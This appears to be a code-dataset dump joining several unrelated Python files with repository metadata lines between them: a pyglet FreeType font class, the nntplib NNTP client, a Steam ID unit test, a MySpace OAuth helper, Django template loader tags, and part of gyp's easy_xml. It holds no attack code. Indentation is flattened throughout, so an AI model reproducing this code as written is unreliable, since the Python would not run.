class FreeTypeMemoryFont(object):
def __init__(self, data):
self.buffer = (ctypes.c_byte * len(data))()
ctypes.memmove(self.buffer, data, len(data))
ft_library = ft_get_library()
self.face = FT_Face()
r = FT_New_Memory_Face(ft_library,
self.buffer, len(self.buffer), 0, self.face)
if r != 0:
raise base.FontException('Could not load font data')
self.name = self.face.contents.family_name
self.bold = self.face.contents.style_flags & FT_STYLE_FLAG_BOLD != 0
self.italic = self.face.contents.style_flags & FT_STYLE_FLAG_ITALIC != 0
# Replace Freetype's generic family name with TTF/OpenType specific
# name if we can find one; there are some instances where Freetype
# gets it wrong.
if self.face.contents.face_flags & FT_FACE_FLAG_SFNT:
name = FT_SfntName()
for i in range(FT_Get_Sfnt_Name_Count(self.face)):
result = FT_Get_Sfnt_Name(self.face, i, name)
if result != 0:
continue
if not (name.platform_id == TT_PLATFORM_MICROSOFT and
name.encoding_id == TT_MS_ID_UNICODE_CS):
continue
if name.name_id == TT_NAME_ID_FONT_FAMILY:
string = string_at(name.string, name.string_len)
self.name = string.decode('utf-16be', 'ignore')
def __del__(self):
try:
FT_Done_Face(self.face)
except:
pass
class FreeTypeFont(base.Font):
glyph_renderer_class = FreeTypeGlyphRenderer
# Map font (name, bold, italic) to FreeTypeMemoryFont
_memory_fonts = {}
def __init__(self, name, size, bold=False, italic=False, dpi=None):
super(FreeTypeFont, self).__init__()
if dpi is None:
dpi = 96 # as of pyglet 1.1; pyglet 1.0 had 72.
# Check if font name/style matches a font loaded into memory by user
lname = name and name.lower() or ''
if (lname, bold, italic) in self._memory_fonts:
font = self._memory_fonts[lname, bold, italic]
self._set_face(font.face, size, dpi)
return
# Use fontconfig to match the font (or substitute a default).
ft_library = ft_get_library()
match = self.get_fontconfig_match(name, size, bold, italic)
if not match:
raise base.FontException('Could not match font "%s"' % name)
f = FT_Face()
if fontconfig.FcPatternGetFTFace(match, FC_FT_FACE, 0, byref(f)) != 0:
value = FcValue()
result = fontconfig.FcPatternGet(match, FC_FILE, 0, byref(value))
if result != 0:
raise base.FontException('No filename or FT face for "%s"' % \
name)
result = FT_New_Face(ft_library, value.u.s, 0, byref(f))
if result:
raise base.FontException('Could not load "%s": %d' % \
(name, result))
fontconfig.FcPatternDestroy(match)
self._set_face(f, size, dpi)
def _set_face(self, face, size, dpi):
self.face = face.contents
self._face_size = float_to_f26p6(size)
self._dpi = dpi
FT_Set_Char_Size(self.face, 0, float_to_f26p6(size), dpi, dpi)
metrics = self.face.size.contents.metrics
if metrics.ascender == 0 and metrics.descender == 0:
# Workaround broken fonts with no metrics. Has been observed with
# courR12-ISO8859-1.pcf.gz: "Courier" "Regular"
#
# None of the metrics fields are filled in, so render a glyph and
# grab its height as the ascent, and make up an arbitrary
# descent.
i = fontconfig.FcFreeTypeCharIndex(byref(self.face), ord('X'))
FT_Load_Glyph(self.face, i, FT_LOAD_RENDER)
self.ascent = self.face.available_sizes.contents.height
self.descent = -self.ascent // 4 # arbitrary.
else:
self.ascent = int(f26p6_to_float(metrics.ascender))
self.descent = int(f26p6_to_float(metrics.descender))
@staticmethod
def get_fontconfig_match(name, size, bold, italic):
if bold:
bold = FC_WEIGHT_BOLD
else:
bold = FC_WEIGHT_REGULAR
if italic:
italic = FC_SLANT_ITALIC
else:
italic = FC_SLANT_ROMAN
fontconfig.FcInit()
if isinstance(name, unicode):
name = name.encode('utf8')
pattern = fontconfig.FcPatternCreate()
fontconfig.FcPatternAddDouble(pattern, FC_SIZE, c_double(size))
fontconfig.FcPatternAddInteger(pattern, FC_WEIGHT, bold)
fontconfig.FcPatternAddInteger(pattern, FC_SLANT, italic)
fontconfig.FcPatternAddString(pattern, FC_FAMILY, name)
fontconfig.FcConfigSubstitute(0, pattern, FcMatchPattern)
fontconfig.FcDefaultSubstitute(pattern)
# Look for a font that matches pattern
result = FcResult()
match = fontconfig.FcFontMatch(0, pattern, byref(result))
fontconfig.FcPatternDestroy(pattern)
return match
@classmethod
def have_font(cls, name):
value = FcValue()
match = cls.get_fontconfig_match(name, 12, False, False)
#result = fontconfig.FcPatternGet(match, FC_FAMILY, 0, byref(value))
if value.u.s == name:
return True
else:
name = name.lower()
for font in cls._memory_fonts.values():
if font.name.lower() == name:
return True
return False
@classmethod
def add_font_data(cls, data):
font = FreeTypeMemoryFont(data)
cls._memory_fonts[font.name.lower(), font.bold, font.italic] = font
|
bsd-3-clause
|
HiSPARC/station-software
|
user/python/Lib/nntplib.py
|
92
|
21470
|
"""An NNTP client class based on RFC 977: Network News Transfer Protocol.
Example:
>>> from nntplib import NNTP
>>> s = NNTP('news')
>>> resp, count, first, last, name = s.group('comp.lang.python')
>>> print 'Group', name, 'has', count, 'articles, range', first, 'to', last
Group comp.lang.python has 51 articles, range 5770 to 5821
>>> resp, subs = s.xhdr('subject', first + '-' + last)
>>> resp = s.quit()
>>>
Here 'resp' is the server response line.
Error responses are turned into exceptions.
To post an article from a file:
>>> f = open(filename, 'r') # file containing article, including header
>>> resp = s.post(f)
>>>
For descriptions of all methods, read the comments in the code below.
Note that all arguments and return values representing article numbers
are strings, not numbers, since they are rarely used for calculations.
"""
# RFC 977 by Brian Kantor and Phil Lapsley.
# xover, xgtitle, xpath, date methods by Kevan Heydon
# Imports
import re
import socket
__all__ = ["NNTP","NNTPReplyError","NNTPTemporaryError",
"NNTPPermanentError","NNTPProtocolError","NNTPDataError",
"error_reply","error_temp","error_perm","error_proto",
"error_data",]
# maximal line length when calling readline(). This is to prevent
# reading arbitrary length lines. RFC 3977 limits NNTP line length to
# 512 characters, including CRLF. We have selected 2048 just to be on
# the safe side.
_MAXLINE = 2048
# Exceptions raised when an error or invalid response is received
class NNTPError(Exception):
"""Base class for all nntplib exceptions"""
def __init__(self, *args):
Exception.__init__(self, *args)
try:
self.response = args[0]
except IndexError:
self.response = 'No response given'
class NNTPReplyError(NNTPError):
"""Unexpected [123]xx reply"""
pass
class NNTPTemporaryError(NNTPError):
"""4xx errors"""
pass
class NNTPPermanentError(NNTPError):
"""5xx errors"""
pass
class NNTPProtocolError(NNTPError):
"""Response does not begin with [1-5]"""
pass
class NNTPDataError(NNTPError):
"""Error in response data"""
pass
# for backwards compatibility
error_reply = NNTPReplyError
error_temp = NNTPTemporaryError
error_perm = NNTPPermanentError
error_proto = NNTPProtocolError
error_data = NNTPDataError
# Standard port used by NNTP servers
NNTP_PORT = 119
# Response numbers that are followed by additional text (e.g. article)
LONGRESP = ['100', '215', '220', '221', '222', '224', '230', '231', '282']
# Line terminators (we always output CRLF, but accept any of CRLF, CR, LF)
CRLF = '\r\n'
# The class itself
class NNTP:
def __init__(self, host, port=NNTP_PORT, user=None, password=None,
readermode=None, usenetrc=True):
"""Initialize an instance. Arguments:
- host: hostname to connect to
- port: port to connect to (default the standard NNTP port)
- user: username to authenticate with
- password: password to use with username
- readermode: if true, send 'mode reader' command after
connecting.
readermode is sometimes necessary if you are connecting to an
NNTP server on the local machine and intend to call
reader-specific commands, such as `group'. If you get
unexpected NNTPPermanentErrors, you might need to set
readermode.
"""
self.host = host
self.port = port
self.sock = socket.create_connection((host, port))
self.file = self.sock.makefile('rb')
self.debugging = 0
self.welcome = self.getresp()
# 'mode reader' is sometimes necessary to enable 'reader' mode.
# However, the order in which 'mode reader' and 'authinfo' need to
# arrive differs between some NNTP servers. Try to send
# 'mode reader', and if it fails with an authorization failed
# error, try again after sending authinfo.
readermode_afterauth = 0
if readermode:
try:
self.welcome = self.shortcmd('mode reader')
except NNTPPermanentError:
# error 500, probably 'not implemented'
pass
except NNTPTemporaryError, e:
if user and e.response[:3] == '480':
# Need authorization before 'mode reader'
readermode_afterauth = 1
else:
raise
# If no login/password was specified, try to get them from ~/.netrc
# Presume that if .netc has an entry, NNRP authentication is required.
try:
if usenetrc and not user:
import netrc
credentials = netrc.netrc()
auth = credentials.authenticators(host)
if auth:
user = auth[0]
password = auth[2]
except IOError:
pass
# Perform NNRP authentication if needed.
if user:
resp = self.shortcmd('authinfo user '+user)
if resp[:3] == '381':
if not password:
raise NNTPReplyError(resp)
else:
resp = self.shortcmd(
'authinfo pass '+password)
if resp[:3] != '281':
raise NNTPPermanentError(resp)
if readermode_afterauth:
try:
self.welcome = self.shortcmd('mode reader')
except NNTPPermanentError:
# error 500, probably 'not implemented'
pass
# Get the welcome message from the server
# (this is read and squirreled away by __init__()).
# If the response code is 200, posting is allowed;
# if it 201, posting is not allowed
def getwelcome(self):
"""Get the welcome message from the server
(this is read and squirreled away by __init__()).
If the response code is 200, posting is allowed;
if it 201, posting is not allowed."""
if self.debugging: print '*welcome*', repr(self.welcome)
return self.welcome
def set_debuglevel(self, level):
"""Set the debugging level. Argument 'level' means:
0: no debugging output (default)
1: print commands and responses but not body text etc.
2: also print raw lines read and sent before stripping CR/LF"""
self.debugging = level
debug = set_debuglevel
def putline(self, line):
"""Internal: send one line to the server, appending CRLF."""
line = line + CRLF
if self.debugging > 1: print '*put*', repr(line)
self.sock.sendall(line)
def putcmd(self, line):
"""Internal: send one command to the server (through putline())."""
if self.debugging: print '*cmd*', repr(line)
self.putline(line)
def getline(self):
"""Internal: return one line from the server, stripping CRLF.
Raise EOFError if the connection is closed."""
line = self.file.readline(_MAXLINE + 1)
if len(line) > _MAXLINE:
raise NNTPDataError('line too long')
if self.debugging > 1:
print '*get*', repr(line)
if not line: raise EOFError
if line[-2:] == CRLF: line = line[:-2]
elif line[-1:] in CRLF: line = line[:-1]
return line
def getresp(self):
"""Internal: get a response from the server.
Raise various errors if the response indicates an error."""
resp = self.getline()
if self.debugging: print '*resp*', repr(resp)
c = resp[:1]
if c == '4':
raise NNTPTemporaryError(resp)
if c == '5':
raise NNTPPermanentError(resp)
if c not in '123':
raise NNTPProtocolError(resp)
return resp
def getlongresp(self, file=None):
"""Internal: get a response plus following text from the server.
Raise various errors if the response indicates an error."""
openedFile = None
try:
# If a string was passed then open a file with that name
if isinstance(file, str):
openedFile = file = open(file, "w")
resp = self.getresp()
if resp[:3] not in LONGRESP:
raise NNTPReplyError(resp)
list = []
while 1:
line = self.getline()
if line == '.':
break
if line[:2] == '..':
line = line[1:]
if file:
file.write(line + "\n")
else:
list.append(line)
finally:
# If this method created the file, then it must close it
if openedFile:
openedFile.close()
return resp, list
def shortcmd(self, line):
"""Internal: send a command and get the response."""
self.putcmd(line)
return self.getresp()
def longcmd(self, line, file=None):
"""Internal: send a command and get the response plus following text."""
self.putcmd(line)
return self.getlongresp(file)
def newgroups(self, date, time, file=None):
"""Process a NEWGROUPS command. Arguments:
- date: string 'yymmdd' indicating the date
- time: string 'hhmmss' indicating the time
Return:
- resp: server response if successful
- list: list of newsgroup names"""
return self.longcmd('NEWGROUPS ' + date + ' ' + time, file)
def newnews(self, group, date, time, file=None):
"""Process a NEWNEWS command. Arguments:
- group: group name or '*'
- date: string 'yymmdd' indicating the date
- time: string 'hhmmss' indicating the time
Return:
- resp: server response if successful
- list: list of message ids"""
cmd = 'NEWNEWS ' + group + ' ' + date + ' ' + time
return self.longcmd(cmd, file)
def list(self, file=None):
"""Process a LIST command. Return:
- resp: server response if successful
- list: list of (group, last, first, flag) (strings)"""
resp, list = self.longcmd('LIST', file)
for i in range(len(list)):
# Parse lines into "group last first flag"
list[i] = tuple(list[i].split())
return resp, list
def description(self, group):
"""Get a description for a single group. If more than one
group matches ('group' is a pattern), return the first. If no
group matches, return an empty string.
This elides the response code from the server, since it can
only be '215' or '285' (for xgtitle) anyway. If the response
code is needed, use the 'descriptions' method.
NOTE: This neither checks for a wildcard in 'group' nor does
it check whether the group actually exists."""
resp, lines = self.descriptions(group)
if len(lines) == 0:
return ""
else:
return lines[0][1]
def descriptions(self, group_pattern):
"""Get descriptions for a range of groups."""
line_pat = re.compile("^(?P<group>[^ \t]+)[ \t]+(.*)$")
# Try the more std (acc. to RFC2980) LIST NEWSGROUPS first
resp, raw_lines = self.longcmd('LIST NEWSGROUPS ' + group_pattern)
if resp[:3] != "215":
# Now the deprecated XGTITLE. This either raises an error
# or succeeds with the same output structure as LIST
# NEWSGROUPS.
resp, raw_lines = self.longcmd('XGTITLE ' + group_pattern)
lines = []
for raw_line in raw_lines:
match = line_pat.search(raw_line.strip())
if match:
lines.append(match.group(1, 2))
return resp, lines
def group(self, name):
"""Process a GROUP command. Argument:
- group: the group name
Returns:
- resp: server response if successful
- count: number of articles (string)
- first: first article number (string)
- last: last article number (string)
- name: the group name"""
resp = self.shortcmd('GROUP ' + name)
if resp[:3] != '211':
raise NNTPReplyError(resp)
words = resp.split()
count = first = last = 0
n = len(words)
if n > 1:
count = words[1]
if n > 2:
first = words[2]
if n > 3:
last = words[3]
if n > 4:
name = words[4].lower()
return resp, count, first, last, name
def help(self, file=None):
"""Process a HELP command. Returns:
- resp: server response if successful
- list: list of strings"""
return self.longcmd('HELP',file)
def statparse(self, resp):
"""Internal: parse the response of a STAT, NEXT or LAST command."""
if resp[:2] != '22':
raise NNTPReplyError(resp)
words = resp.split()
nr = 0
id = ''
n = len(words)
if n > 1:
nr = words[1]
if n > 2:
id = words[2]
return resp, nr, id
def statcmd(self, line):
"""Internal: process a STAT, NEXT or LAST command."""
resp = self.shortcmd(line)
return self.statparse(resp)
def stat(self, id):
"""Process a STAT command. Argument:
- id: article number or message id
Returns:
- resp: server response if successful
- nr: the article number
- id: the message id"""
return self.statcmd('STAT ' + id)
def next(self):
"""Process a NEXT command. No arguments. Return as for STAT."""
return self.statcmd('NEXT')
def last(self):
"""Process a LAST command. No arguments. Return as for STAT."""
return self.statcmd('LAST')
def artcmd(self, line, file=None):
"""Internal: process a HEAD, BODY or ARTICLE command."""
resp, list = self.longcmd(line, file)
resp, nr, id = self.statparse(resp)
return resp, nr, id, list
def head(self, id):
"""Process a HEAD command. Argument:
- id: article number or message id
Returns:
- resp: server response if successful
- nr: article number
- id: message id
- list: the lines of the article's header"""
return self.artcmd('HEAD ' + id)
def body(self, id, file=None):
"""Process a BODY command. Argument:
- id: article number or message id
- file: Filename string or file object to store the article in
Returns:
- resp: server response if successful
- nr: article number
- id: message id
- list: the lines of the article's body or an empty list
if file was used"""
return self.artcmd('BODY ' + id, file)
def article(self, id):
"""Process an ARTICLE command. Argument:
- id: article number or message id
Returns:
- resp: server response if successful
- nr: article number
- id: message id
- list: the lines of the article"""
return self.artcmd('ARTICLE ' + id)
def slave(self):
"""Process a SLAVE command. Returns:
- resp: server response if successful"""
return self.shortcmd('SLAVE')
def xhdr(self, hdr, str, file=None):
"""Process an XHDR command (optional server extension). Arguments:
- hdr: the header type (e.g. 'subject')
- str: an article nr, a message id, or a range nr1-nr2
Returns:
- resp: server response if successful
- list: list of (nr, value) strings"""
pat = re.compile('^([0-9]+) ?(.*)\n?')
resp, lines = self.longcmd('XHDR ' + hdr + ' ' + str, file)
for i in range(len(lines)):
line = lines[i]
m = pat.match(line)
if m:
lines[i] = m.group(1, 2)
return resp, lines
def xover(self, start, end, file=None):
"""Process an XOVER command (optional server extension) Arguments:
- start: start of range
- end: end of range
Returns:
- resp: server response if successful
- list: list of (art-nr, subject, poster, date,
id, references, size, lines)"""
resp, lines = self.longcmd('XOVER ' + start + '-' + end, file)
xover_lines = []
for line in lines:
elem = line.split("\t")
try:
xover_lines.append((elem[0],
elem[1],
elem[2],
elem[3],
elem[4],
elem[5].split(),
elem[6],
elem[7]))
except IndexError:
raise NNTPDataError(line)
return resp,xover_lines
def xgtitle(self, group, file=None):
"""Process an XGTITLE command (optional server extension) Arguments:
- group: group name wildcard (i.e. news.*)
Returns:
- resp: server response if successful
- list: list of (name,title) strings"""
line_pat = re.compile("^([^ \t]+)[ \t]+(.*)$")
resp, raw_lines = self.longcmd('XGTITLE ' + group, file)
lines = []
for raw_line in raw_lines:
match = line_pat.search(raw_line.strip())
if match:
lines.append(match.group(1, 2))
return resp, lines
def xpath(self,id):
"""Process an XPATH command (optional server extension) Arguments:
- id: Message id of article
Returns:
resp: server response if successful
path: directory path to article"""
resp = self.shortcmd("XPATH " + id)
if resp[:3] != '223':
raise NNTPReplyError(resp)
try:
[resp_num, path] = resp.split()
except ValueError:
raise NNTPReplyError(resp)
else:
return resp, path
def date (self):
"""Process the DATE command. Arguments:
None
Returns:
resp: server response if successful
date: Date suitable for newnews/newgroups commands etc.
time: Time suitable for newnews/newgroups commands etc."""
resp = self.shortcmd("DATE")
if resp[:3] != '111':
raise NNTPReplyError(resp)
elem = resp.split()
if len(elem) != 2:
raise NNTPDataError(resp)
date = elem[1][2:8]
time = elem[1][-6:]
if len(date) != 6 or len(time) != 6:
raise NNTPDataError(resp)
return resp, date, time
def post(self, f):
"""Process a POST command. Arguments:
- f: file containing the article
Returns:
- resp: server response if successful"""
resp = self.shortcmd('POST')
# Raises error_??? if posting is not allowed
if resp[0] != '3':
raise NNTPReplyError(resp)
while 1:
line = f.readline()
if not line:
break
if line[-1] == '\n':
line = line[:-1]
if line[:1] == '.':
line = '.' + line
self.putline(line)
self.putline('.')
return self.getresp()
def ihave(self, id, f):
"""Process an IHAVE command. Arguments:
- id: message-id of the article
- f: file containing the article
Returns:
- resp: server response if successful
Note that if the server refuses the article an exception is raised."""
resp = self.shortcmd('IHAVE ' + id)
# Raises error_??? if the server already has it
if resp[0] != '3':
raise NNTPReplyError(resp)
while 1:
line = f.readline()
if not line:
break
if line[-1] == '\n':
line = line[:-1]
if line[:1] == '.':
line = '.' + line
self.putline(line)
self.putline('.')
return self.getresp()
def quit(self):
"""Process a QUIT command and close the socket. Returns:
- resp: server response if successful"""
resp = self.shortcmd('QUIT')
self.file.close()
self.sock.close()
del self.file, self.sock
return resp
# Test retrieval when run as a script.
# Assumption: if there's a local news server, it's called 'news'.
# Assumption: if user queries a remote news server, it's named
# in the environment variable NNTPSERVER (used by slrn and kin)
# and we want readermode off.
if __name__ == '__main__':
import os
newshost = 'news' and os.environ["NNTPSERVER"]
if newshost.find('.') == -1:
mode = 'readermode'
else:
mode = None
s = NNTP(newshost, readermode=mode)
resp, count, first, last, name = s.group('comp.lang.python')
print resp
print 'Group', name, 'has', count, 'articles, range', first, 'to', last
resp, subs = s.xhdr('subject', first + '-' + last)
print resp
for item in subs:
print "%7s %s" % item
resp = s.quit()
print resp
|
gpl-3.0
|
rwesterlund/pysteam
|
pysteam/tests/test_user.py
|
1
|
1232
|
#!/usr/bin/env python
# encoding: utf-8
"""
test_user.py
Created by Scott on 2013-12-29.
Copyright (c) 2013 Scott Rice. All rights reserved.
"""
import sys
import os
import mock
import shutil
import tempfile
import unittest
from pysteam import steam
from pysteam import user
class TestUser(unittest.TestCase):
meris608_32 = 40586375
meris608_64 = 76561198000852103
jankenking_32 = 49642724
jankenking_64 = 76561198009908452
def test_community_id_is_64(self):
self.assertFalse(user._community_id_is_64(self.meris608_32))
self.assertTrue(user._community_id_is_64(self.meris608_64))
self.assertFalse(user._community_id_is_64(self.jankenking_32))
self.assertTrue(user._community_id_is_64(self.jankenking_64))
def test_community_id_32_from_64(self):
self.assertEqual(user._community_id_32_from_64(self.meris608_64), self.meris608_32)
self.assertEqual(user._community_id_32_from_64(self.jankenking_64), self.jankenking_32)
def test_community_id_64_from_32(self):
self.assertEqual(user._community_id_64_from_32(self.meris608_32), self.meris608_64)
self.assertEqual(user._community_id_64_from_32(self.jankenking_32), self.jankenking_64)
|
mit
|
dgouldin/django-socialite
|
socialite/apps/myspace/helper.py
|
1
|
1221
|
import oauth2 as oauth
import urlparse
from django.conf import settings
from django.contrib.auth.models import User
from django.core.cache import cache
from django.utils import simplejson
from socialite.apps.base.oauth import helper as oauth_helper
from socialite.apps.base.oauth20.utils import get_mutable_query_dict
from socialite.apps.myspace import models
api_url = 'http://api.myspace.com/v1/'
oauth_url = 'http://api.myspace.com/'
oauth_actions = {
oauth_helper.REQUEST_TOKEN: 'request_token',
oauth_helper.AUTHORIZE: 'authorize',
oauth_helper.AUTHENTICATE: 'authorize',
oauth_helper.ACCESS_TOKEN: 'access_token',
}
oauth_client = oauth_helper.Client(settings.MYSPACE_KEY, settings.MYSPACE_SECRET, oauth_url, oauth_actions,
signature_method=oauth.SignatureMethod_HMAC_SHA1())
def user_info(access_token):
CACHE_KEY = 'myspace:user_info:%s:' % access_token
info = cache.get(CACHE_KEY)
if info is None:
url = urlparse.urljoin(api_url, 'user.json')
info = simplejson.loads(oauth_client.request(url, access_token))
cache.set(CACHE_KEY, info, 60 * 5) # 5 minutes
return info
def get_unique_id(access_token):
return user_info(access_token)['userId']
|
mit
|
htwenhe/DJOA
|
env/Lib/site-packages/django/template/loader_tags.py
|
115
|
12330
|
import logging
from collections import defaultdict
from django.utils import six
from django.utils.safestring import mark_safe
from .base import (
Node, Template, TemplateSyntaxError, TextNode, Variable, token_kwargs,
)
from .library import Library
register = Library()
BLOCK_CONTEXT_KEY = 'block_context'
logger = logging.getLogger('django.template')
class ExtendsError(Exception):
pass
class BlockContext(object):
def __init__(self):
# Dictionary of FIFO queues.
self.blocks = defaultdict(list)
def add_blocks(self, blocks):
for name, block in six.iteritems(blocks):
self.blocks[name].insert(0, block)
def pop(self, name):
try:
return self.blocks[name].pop()
except IndexError:
return None
def push(self, name, block):
self.blocks[name].append(block)
def get_block(self, name):
try:
return self.blocks[name][-1]
except IndexError:
return None
class BlockNode(Node):
def __init__(self, name, nodelist, parent=None):
self.name, self.nodelist, self.parent = name, nodelist, parent
def __repr__(self):
return "<Block Node: %s. Contents: %r>" % (self.name, self.nodelist)
def render(self, context):
block_context = context.render_context.get(BLOCK_CONTEXT_KEY)
with context.push():
if block_context is None:
context['block'] = self
result = self.nodelist.render(context)
else:
push = block = block_context.pop(self.name)
if block is None:
block = self
# Create new block so we can store context without thread-safety issues.
block = type(self)(block.name, block.nodelist)
block.context = context
context['block'] = block
result = block.nodelist.render(context)
if push is not None:
block_context.push(self.name, push)
return result
def super(self):
if not hasattr(self, 'context'):
raise TemplateSyntaxError(
"'%s' object has no attribute 'context'. Did you use "
"{{ block.super }} in a base template?" % self.__class__.__name__
)
render_context = self.context.render_context
if (BLOCK_CONTEXT_KEY in render_context and
render_context[BLOCK_CONTEXT_KEY].get_block(self.name) is not None):
return mark_safe(self.render(self.context))
return ''
class ExtendsNode(Node):
must_be_first = True
context_key = 'extends_context'
def __init__(self, nodelist, parent_name, template_dirs=None):
self.nodelist = nodelist
self.parent_name = parent_name
self.template_dirs = template_dirs
self.blocks = {n.name: n for n in nodelist.get_nodes_by_type(BlockNode)}
def __repr__(self):
return '<ExtendsNode: extends %s>' % self.parent_name.token
def find_template(self, template_name, context):
"""
This is a wrapper around engine.find_template(). A history is kept in
the render_context attribute between successive extends calls and
passed as the skip argument. This enables extends to work recursively
without extending the same template twice.
"""
# RemovedInDjango20Warning: If any non-recursive loaders are installed
# do a direct template lookup. If the same template name appears twice,
# raise an exception to avoid system recursion.
for loader in context.template.engine.template_loaders:
if not loader.supports_recursion:
history = context.render_context.setdefault(
self.context_key, [context.template.origin.template_name],
)
if template_name in history:
raise ExtendsError(
"Cannot extend templates recursively when using "
"non-recursive template loaders",
)
template = context.template.engine.get_template(template_name)
history.append(template_name)
return template
history = context.render_context.setdefault(
self.context_key, [context.template.origin],
)
template, origin = context.template.engine.find_template(
template_name, skip=history,
)
history.append(origin)
return template
def get_parent(self, context):
parent = self.parent_name.resolve(context)
if not parent:
error_msg = "Invalid template name in 'extends' tag: %r." % parent
if self.parent_name.filters or\
isinstance(self.parent_name.var, Variable):
error_msg += " Got this from the '%s' variable." %\
self.parent_name.token
raise TemplateSyntaxError(error_msg)
if isinstance(parent, Template):
# parent is a django.template.Template
return parent
if isinstance(getattr(parent, 'template', None), Template):
# parent is a django.template.backends.django.Template
return parent.template
return self.find_template(parent, context)
def render(self, context):
compiled_parent = self.get_parent(context)
if BLOCK_CONTEXT_KEY not in context.render_context:
context.render_context[BLOCK_CONTEXT_KEY] = BlockContext()
block_context = context.render_context[BLOCK_CONTEXT_KEY]
# Add the block nodes from this node to the block context
block_context.add_blocks(self.blocks)
# If this block's parent doesn't have an extends node it is the root,
# and its block nodes also need to be added to the block context.
for node in compiled_parent.nodelist:
# The ExtendsNode has to be the first non-text node.
if not isinstance(node, TextNode):
if not isinstance(node, ExtendsNode):
blocks = {n.name: n for n in
compiled_parent.nodelist.get_nodes_by_type(BlockNode)}
block_context.add_blocks(blocks)
break
# Call Template._render explicitly so the parser context stays
# the same.
return compiled_parent._render(context)
class IncludeNode(Node):
context_key = '__include_context'
def __init__(self, template, *args, **kwargs):
self.template = template
self.extra_context = kwargs.pop('extra_context', {})
self.isolated_context = kwargs.pop('isolated_context', False)
super(IncludeNode, self).__init__(*args, **kwargs)
def render(self, context):
"""
Render the specified template and context. Cache the template object
in render_context to avoid reparsing and loading when used in a for
loop.
"""
try:
template = self.template.resolve(context)
# Does this quack like a Template?
if not callable(getattr(template, 'render', None)):
# If not, we'll try our cache, and get_template()
template_name = template
cache = context.render_context.setdefault(self.context_key, {})
template = cache.get(template_name)
if template is None:
template = context.template.engine.get_template(template_name)
cache[template_name] = template
values = {
name: var.resolve(context)
for name, var in six.iteritems(self.extra_context)
}
if self.isolated_context:
return template.render(context.new(values))
with context.push(**values):
return template.render(context)
except Exception:
if context.template.engine.debug:
raise
template_name = getattr(context, 'template_name', None) or 'unknown'
logger.warning(
"Exception raised while rendering {%% include %%} for "
"template '%s'. Empty string rendered instead.",
template_name,
exc_info=True,
)
return ''
@register.tag('block')
def do_block(parser, token):
"""
Define a block that can be overridden by child templates.
"""
# token.split_contents() isn't useful here because this tag doesn't accept variable as arguments
bits = token.contents.split()
if len(bits) != 2:
raise TemplateSyntaxError("'%s' tag takes only one argument" % bits[0])
block_name = bits[1]
# Keep track of the names of BlockNodes found in this template, so we can
# check for duplication.
try:
if block_name in parser.__loaded_blocks:
raise TemplateSyntaxError("'%s' tag with name '%s' appears more than once" % (bits[0], block_name))
parser.__loaded_blocks.append(block_name)
except AttributeError: # parser.__loaded_blocks isn't a list yet
parser.__loaded_blocks = [block_name]
nodelist = parser.parse(('endblock',))
# This check is kept for backwards-compatibility. See #3100.
endblock = parser.next_token()
acceptable_endblocks = ('endblock', 'endblock %s' % block_name)
if endblock.contents not in acceptable_endblocks:
parser.invalid_block_tag(endblock, 'endblock', acceptable_endblocks)
return BlockNode(block_name, nodelist)
@register.tag('extends')
def do_extends(parser, token):
"""
Signal that this template extends a parent template.
This tag may be used in two ways: ``{% extends "base" %}`` (with quotes)
uses the literal value "base" as the name of the parent template to extend,
or ``{% extends variable %}`` uses the value of ``variable`` as either the
name of the parent template to extend (if it evaluates to a string) or as
the parent template itself (if it evaluates to a Template object).
"""
bits = token.split_contents()
if len(bits) != 2:
raise TemplateSyntaxError("'%s' takes one argument" % bits[0])
parent_name = parser.compile_filter(bits[1])
nodelist = parser.parse()
if nodelist.get_nodes_by_type(ExtendsNode):
raise TemplateSyntaxError("'%s' cannot appear more than once in the same template" % bits[0])
return ExtendsNode(nodelist, parent_name)
@register.tag('include')
def do_include(parser, token):
"""
Loads a template and renders it with the current context. You can pass
additional context using keyword arguments.
Example::
{% include "foo/some_include" %}
{% include "foo/some_include" with bar="BAZZ!" baz="BING!" %}
Use the ``only`` argument to exclude the current context when rendering
the included template::
{% include "foo/some_include" only %}
{% include "foo/some_include" with bar="1" only %}
"""
bits = token.split_contents()
if len(bits) < 2:
raise TemplateSyntaxError(
"%r tag takes at least one argument: the name of the template to "
"be included." % bits[0]
)
options = {}
remaining_bits = bits[2:]
while remaining_bits:
option = remaining_bits.pop(0)
if option in options:
raise TemplateSyntaxError('The %r option was specified more '
'than once.' % option)
if option == 'with':
value = token_kwargs(remaining_bits, parser, support_legacy=False)
if not value:
raise TemplateSyntaxError('"with" in %r tag needs at least '
'one keyword argument.' % bits[0])
elif option == 'only':
value = True
else:
raise TemplateSyntaxError('Unknown argument for %r tag: %r.' %
(bits[0], option))
options[option] = value
isolated_context = options.get('only', False)
namemap = options.get('with', {})
return IncludeNode(parser.compile_filter(bits[1]), extra_context=namemap,
isolated_context=isolated_context)
|
mit
|
jholloman/node-gyp
|
gyp/pylib/gyp/easy_xml.py
|
1049
|
4803
|
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
import os
def XmlToString(content, encoding='utf-8', pretty=False):
""" Writes the XML content to disk, touching the file only if it has changed.
Visual Studio files have a lot of pre-defined structures. This function makes
it easy to represent these structures as Python data structures, instead of
having to create a lot of function calls.
Each XML element of the content is represented as a list composed of:
1. The name of the element, a string,
2. The attributes of the element, a dictionary (optional), and
3+. The content of the element, if any. Strings are simple text nodes and
lists are child elements.
Example 1:
<test/>
becomes
['test']
Example 2:
<myelement a='value1' b='value2'>
<childtype>This is</childtype>
<childtype>it!</childtype>
</myelement>
becomes
['myelement', {'a':'value1', 'b':'value2'},
['childtype', 'This is'],
['childtype', 'it!'],
]
Args:
content: The structured content to be converted.
encoding: The encoding to report on the first XML line.
pretty: True if we want pretty printing with indents and new lines.
Returns:
The XML content as a string.
"""
# We create a huge list of all the elements of the file.
xml_parts = ['<?xml version="1.0" encoding="%s"?>' % encoding]
if pretty:
xml_parts.append('\n')
_ConstructContentList(xml_parts, content, pretty)
# Convert it to a string
return ''.join(xml_parts)
def _ConstructContentList(xml_parts, specification, pretty, level=0):
""" Appends the XML parts corresponding to the specification.
Args:
xml_parts: A list of XML parts to be appended to.
specification: The specification of the element. See EasyXml docs.
pretty: True if we want pretty printing with indents and new lines.
level: Indentation level.
"""
# The first item in a specification is the name of the element.
if pretty:
indentation = ' ' * level
new_line = '\n'
else:
indentation = ''
new_line = ''
name = specification[0]
if not isinstance(name, str):
raise Exception('The first item of an EasyXml specification should be '
'a string. Specification was ' + str(specification))
xml_parts.append(indentation + '<' + name)
